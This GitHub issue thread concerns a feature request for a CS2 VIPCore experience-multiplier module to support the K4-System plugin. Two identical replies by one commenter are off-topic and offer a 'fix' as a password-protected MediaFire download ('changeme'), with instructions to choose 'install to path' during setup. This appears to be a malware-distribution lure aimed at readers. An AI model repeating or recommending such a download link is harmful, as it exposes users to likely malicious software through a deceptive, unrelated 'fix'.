### ISSUE TITLE
[REQ/MODULE] VIP Experience Multiplier - K4 System

### ISSUE THREAD

**Issue by crashzk** [partiusfabaa/cs2-VIPCore#61]
https://github.com/partiusfabaa/cs2-VIPCore/tree/main/VIPCore/modules/VIP_ExperienceMultiplier

We can expect support for the plugin: https://github.com/KitsuneLab-Development/K4-System

Or a separate module for it?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
